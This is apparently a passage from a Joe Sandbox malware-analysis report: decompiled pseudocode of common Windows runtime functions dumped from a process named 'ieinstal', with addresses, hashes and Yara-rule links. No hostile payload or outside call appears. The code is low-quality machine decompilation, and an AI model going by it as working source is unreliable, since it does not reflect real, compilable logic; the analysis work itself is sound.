								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x1ed4b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x1ed484c0;
										if(_t69 >=  *0x1ed484c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E1ED29063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E1EC5922A(_t82);
							_t53 = E1EC77D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E1ED28B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x1ed486c0; // 0x2e507b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x1ed486b8; // 0x2ebb6e0
									if(__eflags == 0) {
										_t79 = 0x1ed486bc;
										_t72 = 0x1ed486b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E1EC59240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x1ed486c4;
									_t72 = 0x1ed486c0;
									L18:
									E1EC89B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                            0x1ec59100
                                                            0x1ec59100
                                                            0x1ec59100
                                                            0x1ec59100
                                                            0x1ec59102
                                                            0x1ec59107
                                                            0x1ec5910c
                                                            0x1ec59110
                                                            0x1ec59115
                                                            0x1ec59136
                                                            0x1ec59143
                                                            0x1ecb37e4
                                                            0x1ecb37e4
                                                            0x1ec59149
                                                            0x1ec5914e
                                                            0x1ec5914e
                                                            0x1ec59117
                                                            0x1ec5911d
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec5911f
                                                            0x1ec59125
                                                            0x00000000
                                                            0x1ec59151
                                                            0x1ec59158
                                                            0x1ec5915d
                                                            0x1ec59161
                                                            0x1ec59168
                                                            0x1ecb3715
                                                            0x00000000
                                                            0x1ec5916e
                                                            0x1ec5916e
                                                            0x1ec59175
                                                            0x1ec59177
                                                            0x1ec5917e
                                                            0x1ec5917f
                                                            0x1ec59182
                                                            0x1ec59182
                                                            0x1ec59187
                                                            0x1ec59187
                                                            0x1ec5918a
                                                            0x1ec5918d
                                                            0x1ec5918f
                                                            0x1ec59192
                                                            0x1ec59195
                                                            0x1ec59198
                                                            0x1ec59198
                                                            0x1ec59198
                                                            0x1ec5919a
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecb371f
                                                            0x1ecb3721
                                                            0x1ecb3727
                                                            0x1ecb372f
                                                            0x1ecb3733
                                                            0x1ecb3735
                                                            0x1ecb3738
                                                            0x1ecb373b
                                                            0x1ecb373d
                                                            0x1ecb3740
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecb3746
                                                            0x1ecb3749
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecb374f
                                                            0x1ecb3751
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecb3757
                                                            0x1ecb3759
                                                            0x1ecb375c
                                                            0x1ecb375c
                                                            0x1ecb375e
                                                            0x1ecb375e
                                                            0x1ecb3761
                                                            0x1ecb3764
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecb3766
                                                            0x1ecb3768
                                                            0x1ecb37a3
                                                            0x1ecb37a3
                                                            0x1ecb37a5
                                                            0x1ecb37a7
                                                            0x1ecb37ad
                                                            0x1ecb37b0
                                                            0x1ecb37b2
                                                            0x1ecb37bc
                                                            0x1ecb37c2
                                                            0x1ecb37c2
                                                            0x1ecb37b2
                                                            0x1ec59187
                                                            0x1ec59187
                                                            0x1ec5918a
                                                            0x1ec5918d
                                                            0x1ec5918f
                                                            0x1ec59192
                                                            0x1ec59195
                                                            0x00000000
                                                            0x1ec59195
                                                            0x00000000
                                                            0x1ec59187
                                                            0x1ecb376a
                                                            0x1ecb376a
                                                            0x1ecb376c
                                                            0x1ecb376c
                                                            0x1ecb376f
                                                            0x1ecb3775
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecb3777
                                                            0x1ecb3779
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecb3782
                                                            0x1ecb3787
                                                            0x1ecb3789
                                                            0x1ecb3790
                                                            0x1ecb3790
                                                            0x1ecb378b
                                                            0x1ecb378b
                                                            0x1ecb378b
                                                            0x1ecb3792
                                                            0x1ecb3795
                                                            0x1ecb3795
                                                            0x1ecb3798
                                                            0x1ecb3798
                                                            0x1ecb379b
                                                            0x1ecb379b
                                                            0x1ec591a3
                                                            0x1ec591a9
                                                            0x1ec591b0
                                                            0x1ec591b4
                                                            0x1ec591b4
                                                            0x1ec591bb
                                                            0x1ec591c0
                                                            0x1ec591c5
                                                            0x1ec591c7
                                                            0x1ecb37da
                                                            0x1ec591cd
                                                            0x1ec591cd
                                                            0x1ec591cd
                                                            0x1ec591d2
                                                            0x1ec591d5
                                                            0x1ec59239
                                                            0x1ec59239
                                                            0x1ec591d7
                                                            0x1ec591db
                                                            0x1ec591e1
                                                            0x1ec591e7
                                                            0x1ec591fd
                                                            0x1ec59203
                                                            0x1ec5921e
                                                            0x1ec59223
                                                            0x00000000
                                                            0x1ec59223
                                                            0x1ec59205
                                                            0x1ec59208
                                                            0x1ec5920c
                                                            0x1ec59214
                                                            0x1ec59214
                                                            0x1ec591e9
                                                            0x1ec591e9
                                                            0x1ec591ee
                                                            0x1ec591f3
                                                            0x1ec591f3
                                                            0x1ec591f3
                                                            0x1ec591e7
                                                            0x00000000
                                                            0x1ec591db
                                                            0x1ec59187
                                                            0x1ec59168

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9d766753310038760fecdaaf698ac9eb7c439d047e16570b5edaad004cadbcdc
                                                            • Instruction ID: f0ed34c854232bce0b771f905dd31793d7c2f714bf1051db2a73580647faf184
                                                            • Opcode Fuzzy Hash: 9d766753310038760fecdaaf698ac9eb7c439d047e16570b5edaad004cadbcdc
                                                            • Instruction Fuzzy Hash: 0B31E47AA00296CFC711CF69C884BCDB7B2BF46354F188799E42467344C730A880CB55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC70050 Relevance: .1, Instructions: 81COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 53%
                                                            			E1EC70050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x1ed4d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E1EC89ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E1EC9B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E1ED28A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E1EC89702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x1ed4b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                            0x1ec70055
                                                            0x1ec7005d
                                                            0x1ec70062
                                                            0x1ec7006c
                                                            0x1ec7006f
                                                            0x1ec70074
                                                            0x1ec7007a
                                                            0x1ec7007a
                                                            0x1ec70080
                                                            0x1ec70080
                                                            0x1ec70087
                                                            0x1ec7008d
                                                            0x1ec7008f
                                                            0x1ec70093
                                                            0x1ec70095
                                                            0x1ec7009b
                                                            0x1ec700f8
                                                            0x1ec700fb
                                                            0x1ec700fc
                                                            0x1ec700ff
                                                            0x1ec70108
                                                            0x1ec70108
                                                            0x1ec700a2
                                                            0x1ec700a6
                                                            0x1ec700b3
                                                            0x1ec700bc
                                                            0x1ec700c5
                                                            0x1ec700ca
                                                            0x1ecbc01e
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecbc02d
                                                            0x1ec700d5
                                                            0x1ec700d9
                                                            0x1ecbc03d
                                                            0x1ecbc046
                                                            0x1ecbc046
                                                            0x1ec700df
                                                            0x1ec700e2
                                                            0x1ec700ea
                                                            0x1ec700ef
                                                            0x1ec700f2
                                                            0x1ec700f6
                                                            0x1ec70111
                                                            0x1ec70117
                                                            0x1ec70117
                                                            0x00000000
                                                            0x1ec700f6
                                                            0x1ec700d0
                                                            0x1ec700d0
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9a226ec1a46325d8ae8416c9455ed2a2882c02236a9d74349b6f6803e1a16c8f
                                                            • Instruction ID: 532d2a09678df7e23d5532e446117c10a61a18c758a4fca713194be00365a0c8
                                                            • Opcode Fuzzy Hash: 9a226ec1a46325d8ae8416c9455ed2a2882c02236a9d74349b6f6803e1a16c8f
                                                            • Instruction Fuzzy Hash: B131BF36601B44CFD725CF28CD41B96B3E6FF88724F144A6DE4AA87A94DB31B801CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ECD6C0A Relevance: .1, Instructions: 79COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 77%
                                                            			E1ECD6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E1EC77D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x1ed47b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L1EC74620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E1EC9F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E1EC77D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E1EC99AE0();
						_t23 = L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                            0x1ecd6c0a
                                                            0x1ecd6c0f
                                                            0x1ecd6c10
                                                            0x1ecd6c13
                                                            0x1ecd6c15
                                                            0x1ecd6c19
                                                            0x1ecd6c1c
                                                            0x1ecd6c21
                                                            0x1ecd6c28
                                                            0x1ecd6c3a
                                                            0x1ecd6c2a
                                                            0x1ecd6c33
                                                            0x1ecd6c33
                                                            0x1ecd6c3f
                                                            0x1ecd6c48
                                                            0x1ecd6c4d
                                                            0x1ecd6c60
                                                            0x1ecd6c65
                                                            0x1ecd6c69
                                                            0x1ecd6c73
                                                            0x1ecd6c79
                                                            0x1ecd6c7f
                                                            0x1ecd6c86
                                                            0x1ecd6c90
                                                            0x1ecd6c94
                                                            0x1ecd6ca6
                                                            0x1ecd6cb2
                                                            0x1ecd6cbd
                                                            0x1ecd6cbd
                                                            0x1ecd6cc3
                                                            0x1ecd6cc7
                                                            0x1ecd6ccb
                                                            0x1ecd6cd0
                                                            0x1ecd6cd1
                                                            0x1ecd6ce2
                                                            0x1ecd6ce2
                                                            0x1ecd6c69
                                                            0x1ecd6ced

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5b2dfefe967a5a4574ce1bd740fe913c0edfb93d7bc893b2c6716c8522b652ed
                                                            • Instruction ID: 21717745ad66a9af8cee3c0d752af1633f612660ab5b01e26b96400050fc4539
                                                            • Opcode Fuzzy Hash: 5b2dfefe967a5a4574ce1bd740fe913c0edfb93d7bc893b2c6716c8522b652ed
                                                            • Instruction Fuzzy Hash: A7217AB6A00684ABC711CB69DC80E6AB7B8FF48740F144269F904DB791EB35E951CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC990AF Relevance: .1, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 82%
                                                            			E1EC990AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E1ECAD4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E1EC8E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L1EC74620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E1EC9F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E1EC8A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                            0x1ec990af
                                                            0x1ec990b8
                                                            0x1ec990bb
                                                            0x1ec990bf
                                                            0x1ec990c2
                                                            0x1ec990c2
                                                            0x1ec990c8
                                                            0x1ec990cb
                                                            0x1ec990cd
                                                            0x1ecd14d7
                                                            0x1ecd14eb
                                                            0x1ecd14eb
                                                            0x00000000
                                                            0x1ecd14eb
                                                            0x1ecd14db
                                                            0x1ecd14e6
                                                            0x00000000
                                                            0x1ecd14f2
                                                            0x1ecd14e8
                                                            0x00000000
                                                            0x1ecd14e8
                                                            0x1ec990d8
                                                            0x1ec990da
                                                            0x1ec990dd
                                                            0x1ec990e5
                                                            0x00000000
                                                            0x1ec99139
                                                            0x1ec990fa
                                                            0x1ec990fe
                                                            0x1ec99142
                                                            0x00000000
                                                            0x1ec99142
                                                            0x1ec99104
                                                            0x1ec99107
                                                            0x1ec9910b
                                                            0x1ec99110
                                                            0x1ec99118
                                                            0x1ec99147
                                                            0x1ec99148
                                                            0x1ec9914f
                                                            0x1ec99150
                                                            0x1ec99151
                                                            0x1ec99152
                                                            0x1ec99156
                                                            0x1ec9915d
                                                            0x1ec99160
                                                            0x1ec99168
                                                            0x1ec9916c
                                                            0x1ec991bc
                                                            0x1ec991be
                                                            0x00000000
                                                            0x1ec991be
                                                            0x1ec9916e
                                                            0x1ec99173
                                                            0x1ec99176
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec9917c
                                                            0x1ec99180
                                                            0x1ec991b5
                                                            0x00000000
                                                            0x1ec991b5
                                                            0x1ec99182
                                                            0x1ec99185
                                                            0x1ec99189
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec9918e
                                                            0x1ec99190
                                                            0x1ec99198
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec991a0
                                                            0x00000000
                                                            0x1ec991ad
                                                            0x1ec991ad
                                                            0x1ec991b0
                                                            0x1ec991b1
                                                            0x00000000
                                                            0x1ec99185
                                                            0x1ec9911a
                                                            0x1ec9911c
                                                            0x1ec9911f
                                                            0x1ec99125
                                                            0x1ec99127
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                            • Instruction ID: 85c9917a91a6094cfd26255f07ac31f3cdad18a50659289d1aa8c9107b23ff32
                                                            • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                            • Instruction Fuzzy Hash: C6217C76A00346EFD721CF5ACC44A9ABBF8FB44310F158A6AFA49A7610D730ED44DB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC83B7A Relevance: .1, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 59%
                                                            			E1EC83B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x1ed484c4; // 0x0
				_v12 = 1;
				_v8 =  *0x1ed484c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L1EC74620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x1ed484c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E1EC9AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E1EC9FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x1ed484c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x1ed484c4; // 0x0
					L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                            0x1ec83b89
                                                            0x1ec83b96
                                                            0x1ec83ba1
                                                            0x1ec83bab
                                                            0x1ec83bb5
                                                            0x1ec83bb9
                                                            0x1ecc6298
                                                            0x1ec83bbf
                                                            0x1ec83bc2
                                                            0x1ec83bc3
                                                            0x1ec83bc9
                                                            0x1ec83bca
                                                            0x1ec83bcc
                                                            0x1ec83bcd
                                                            0x1ec83bd4
                                                            0x1ec83bd6
                                                            0x1ec83bdb
                                                            0x1ec83bea
                                                            0x1ec83bf7
                                                            0x1ec83bfb
                                                            0x1ec83bff
                                                            0x1ec83c09
                                                            0x1ec83c0a
                                                            0x1ec83c0b
                                                            0x1ec83c0f
                                                            0x1ec83c14
                                                            0x1ec83c18
                                                            0x1ec83c18
                                                            0x1ec83bfb
                                                            0x1ec83c1b
                                                            0x1ec83c30
                                                            0x1ec83c30
                                                            0x1ec83c3d

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 59cbcb065c96d8e9db8bea02a173e709a17f45ee338a06213dfff6f8fbcb25ce
                                                            • Instruction ID: 0bea48d080fe0c927f7086780c0718c9ad8dd510881b397bc939fa33364ccb95
                                                            • Opcode Fuzzy Hash: 59cbcb065c96d8e9db8bea02a173e709a17f45ee338a06213dfff6f8fbcb25ce
                                                            • Instruction Fuzzy Hash: 4A218E72A00118AFD700DF98CE81F5EBBBEFF44748F160668E908AB651D771AD52DB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ECD6CF0 Relevance: .1, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 80%
                                                            			E1ECD6CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E1EC77D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E1EC77D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x1ec35c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E1EC8F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E1EC8F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E1ECD7016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L1EC72400( &_v52);
								}
								_t21 = L1EC72400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                            0x1ecd6cfb
                                                            0x1ecd6d00
                                                            0x1ecd6d02
                                                            0x1ecd6d06
                                                            0x1ecd6d0a
                                                            0x1ecd6d0e
                                                            0x1ecd6d19
                                                            0x1ecd6d2b
                                                            0x1ecd6d1b
                                                            0x1ecd6d24
                                                            0x1ecd6d24
                                                            0x1ecd6d33
                                                            0x1ecd6d39
                                                            0x1ecd6d46
                                                            0x1ecd6d4f
                                                            0x1ecd6d61
                                                            0x1ecd6d51
                                                            0x1ecd6d5a
                                                            0x1ecd6d5a
                                                            0x1ecd6d69
                                                            0x1ecd6d6b
                                                            0x1ecd6d6d
                                                            0x1ecd6d6f
                                                            0x1ecd6d6f
                                                            0x1ecd6d74
                                                            0x1ecd6d79
                                                            0x1ecd6d7a
                                                            0x1ecd6d7f
                                                            0x1ecd6d82
                                                            0x1ecd6d88
                                                            0x1ecd6d89
                                                            0x1ecd6d90
                                                            0x1ecd6d94
                                                            0x1ecd6da7
                                                            0x1ecd6db1
                                                            0x1ecd6db1
                                                            0x1ecd6dbb
                                                            0x1ecd6dbb
                                                            0x1ecd6d90
                                                            0x1ecd6d69
                                                            0x1ecd6d46
                                                            0x1ecd6dc6

                                                            Memory Dump Source
